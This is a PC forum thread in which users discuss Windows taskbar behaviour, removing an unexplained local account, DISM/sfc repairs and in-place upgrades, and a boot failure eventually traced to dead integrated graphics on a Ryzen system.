spiderhr 10.01.2024. 10:09

Quote:

Originally Posted by kopija (Post 3721204)
And how would you want to open it?

By the power of thought?

The way it was before. You'd click the icon in the taskbar, it would open, and then you could click the same icon to open a second one, a third...

Anyway, the grouping option is the first thing I turn off, because I don't like that way of working.

udarnik60 10.01.2024. 10:13

Quote:

Originally Posted by spiderhr (Post 3721205)
The way it was before. You'd click the icon in the taskbar, it would open, and then you could click the same icon to open a second one, a third...

Anyway, the grouping option is the first thing I turn off, because I don't like that way of working.

Doesn't Win + E open a new one for you? Or a middle click on the taskbar icon?

Sent from my motorola edge 40 using Tapatalk

spiderhr 10.01.2024. 10:40

Meh... too many clicks, plus I have to take my hand off the mouse. The Win + E one does open it.

I just wanted, if I already have shortcuts in the taskbar, to be able to open them multiple times with the mouse. Oh well, Linux has spoiled me, and up to W7 everything was normal too, until they started pulling crazy stunts with the interface claiming it's better.

Edit: just grumbling about Win a bit. Better at Win than at my colleagues.

mkey 11.01.2024. 20:09

A middle click on the taskbar icon should open another window, whatever the application (as long as it allows multiple instances).

Neo-ST 11.02.2024. 14:19

Guys, out of the blue a "user1" appeared on my Windows.
So last night everything was normal, I shut the PC down, went to bed, today I turn it on and I'm greeted by the login screen asking which user I want to log into Win with, my default one or that user1.
If I click user1, it asks for a password. Wtf.

I log into mine and in Settings under Users I see this:

https://i.postimg.cc/64pbkKxL/Image-007.png

Is it possible that some Win update created that user?

EDIT:
Had to go into safe mode, cmd run as admin, "net user user1 /del" to delete that account.
After that a normal boot into Win, then run netplwiz again and untick "users must enter username and password to log in to this computer", because without that it still stopped me at the login screen after boot.

Bravo Microsoft, bravo.

mkey 12.02.2024. 18:39

It's a bit suspicious that Windows created that account.

domy_os 12.02.2024. 20:05

https://www.ultimatewindowssecurity....x?eventid=4720

Roberto 15.07.2024. 22:06

Guys, does anyone know what it's called, and how to get to that option where you refresh Windows without losing installed apps or data?


Quite a while ago I ran into a strange problem on one PC - you couldn't use some Win apps or get into Settings; when you tried, the screen would flash and the launched app/setting would close automatically, you simply couldn't do anything with them.

I remember solving it back then with a kind of Windows "refresh" (or maybe even of the user account?), and now I can't for the life of me remember what that option is called or how to get to it. Does anyone know what I'm talking about?


So it's not the classic Win refresh where you lose files or applications; here you lose nothing.

Disco 16.07.2024. 09:20

Quote:

Originally Posted by Roberto (Post 3752314)
Guys, does anyone know what it's called, and how to get to that option where you refresh Windows without losing installed apps or data?


Quite a while ago I ran into a strange problem on one PC - you couldn't use some Win apps or get into Settings; when you tried, the screen would flash and the launched app/setting would close automatically, you simply couldn't do anything with them.

I remember solving it back then with a kind of Windows "refresh" (or maybe even of the user account?), and now I can't for the life of me remember what that option is called or how to get to it. Does anyone know what I'm talking about?


So it's not the classic Win refresh where you lose files or applications; here you lose nothing.

Or you do a Win-over-Win upgrade. That is, you just reinstall Win over Win with the options you mentioned ticked, or you go to Reset PC and do the same, i.e. reset the PC but with the options turned on so it doesn't touch programs and settings.
The difference is that for the upgrade you download an ISO, while the reset reinstalls from Windows itself (the component store or wherever).

Maybe to start with, try opening CMD as admin and first typing:
DISM /Online /Cleanup-Image /RestoreHealth

When that finishes, then also:
sfc /scannow

After that restart Win and see whether it helped.

Some problems won't be fixed even by an upgrade/reset.

Mario92 16.07.2024. 10:57

Just search for "Reset this PC", or Settings -> System -> Recovery, at least that's how it is on Win11.

I think Reset PC also downloads an ISO and actually does an in-place upgrade.

Roberto 16.07.2024. 12:43

After about 3 hours of fiddling, I found that what I'm looking for, and what I did back then, is the aforementioned in-place upgrade :D

As far as I saw, it can't be started from the Reset PC / recovery options; you have to download the ISO, run it and do an upgrade over the existing installation.

@Disco, I did try DISM, SFC and a bunch of other similar fixes last time; everything I could google on the subject, I tried. In the end the in-place upgrade saved me from a full reinstall.

Pity I don't have time to research why this happened and whether there's an even simpler and faster way to fix it. So literally, when you start a preinstalled Win app, or try to open Settings, or something from Control Panel, the screen starts flickering and the only thing you can do is close the launch frame of Settings or of the app, which sits there frozen. If you try to do it again, the app immediately closes by itself.

This is the second time I've run into this problem.

Disco 16.07.2024. 13:01

Quote:

Originally Posted by Mario92 (Post 3752376)
Just search for "Reset this PC", or Settings -> System -> Recovery, at least that's how it is on Win11.

I think Reset PC also downloads an ISO and actually does an in-place upgrade.

During the reset you choose whether to download from the net or from the disk.

Roberto 17.12.2024. 21:17

I have a case of badly broken Win10 after a Windows Update.
After the update the PC would boot and as soon as the desktop loaded - black screen. It wouldn't let me into safe mode, nothing in RE either, it wouldn't even run System Restore.


Then I managed to trick it by putting an NVIDIA graphics card in the PC (the PC has an AMD CPU with an integrated GPU), and after that I managed to get into Windows in safe mode. From there, admittedly, I couldn't remove the problematic latest update in any way, but I did manage to run System Restore; however, after restoring to an older point, on starting Windows I get a BSOD with the message "Critical process died".


And after that, whether with the integrated or the other card, I can't get into safe mode anymore either; it just throws that error every time.



The only thing I can get into is RE, and from there in Troubleshoot:
- Startup Repair - zero points, won't work
- Startup Settings - nothing either, I can't get into safe mode or anything else it offers
- Uninstall Updates - nothing either, it throws an error every time
- System Restore - here it offers me some restore points, but this time, on selecting a restore point, it says: "you must enable system protection on this drive"
- CMD in RE: here I tried the DISM and SFC commands, but none of that worked for me, it throws some errors as well.


What I did manage is to back up the data, so a clean install is an option, but I'd definitely like to avoid it because of the various software that would have to go back on.


I assume some driver is screwed and that's why Windows is acting up and won't start; I found no hardware errors.



My questions are:
1) Is there a way to do an in-place upgrade of Win 10 "from the outside", from some bootable media, say from Strelec's WinPE? Or with some other tool? I think that could fix things.

2) Can I manually try to copy/replace some Win system files (since DISM and SFC won't run)?

Roberto 18.12.2024. 11:52

Adding this in case someone runs into the same problem - I gave up on saving Windows :D


I tried almost everything from Strelec that's relevant to the problem; absolutely nothing worked, it wouldn't even let me copy some files whichever way I tried, so I then installed Windows without formatting the disk and from the Windows.old folder backed up what I hadn't managed to before, and after that did a clean install. I've never had a case until now where WinRE was so broken that I literally couldn't do anything successfully.

mkey 18.12.2024. 18:39

I think in such situations a full format is the only sensible option. You'll see :D

Roberto 18.12.2024. 19:48

I know it is, that's what I did in the end, but I always somehow hope I'll save myself some trouble, and in the end I prolong it with fiddling and experimenting :D


Anyway, it turns out in the end that something did die and it's not just software, because after the reinstall the PC ran fine for a few hours, and then started crashing with a new BSOD... And I had tested all the components except the MBO, so now it'll turn out the MBO itself is busted.

calypso 18.12.2024. 19:53

Quote:

Originally Posted by Roberto (Post 3780225)
I know it is, that's what I did in the end, but I always somehow hope I'll save myself some trouble, and in the end I prolong it with fiddling and experimenting :D

Rule of thumb with Windows (and in general)... If troubleshooting is going to take longer than 4 hours, better reinstall...

mkey 18.12.2024. 20:47

Roberto, if you haven't, do a full format and install, definitely before you go replacing the board.

Roberto 18.12.2024. 22:31

See above, I did a clean install. I certainly won't replace anything until I'm sure what it is.

Anyways, tried another PSU, RAM and disk, no change, and then stuck my NVIDIA 9600GT card back in and it works with it now. So after all it looks like the graphics module on the MBO died... It's a Ryzen 5 Pro 4650G on a Gigabyte A520M-2SH board.

Nikky 18.12.2024. 23:53

Ryzen 5 Pro 4650G > https://www.techpowerup.com/cpu-spec...ro-4650g.c2325
The Radeon Vega 7 graphics are inside the CPU.

If it runs stably now and you don't feel like poking at it anymore, leave it as it is.

If you want to check what's up with the integrated graphics you need to remove the add-on card, carefully remove the CPU cooler, take the CPU out, inspect the pins in the socket and on the CPU,
reassemble everything carefully, thermal paste, pay attention to how the CPU cooler seats ..... testing ...


© 1999-2024 PC Ekspert - All rights reserved ISSN 1334-2940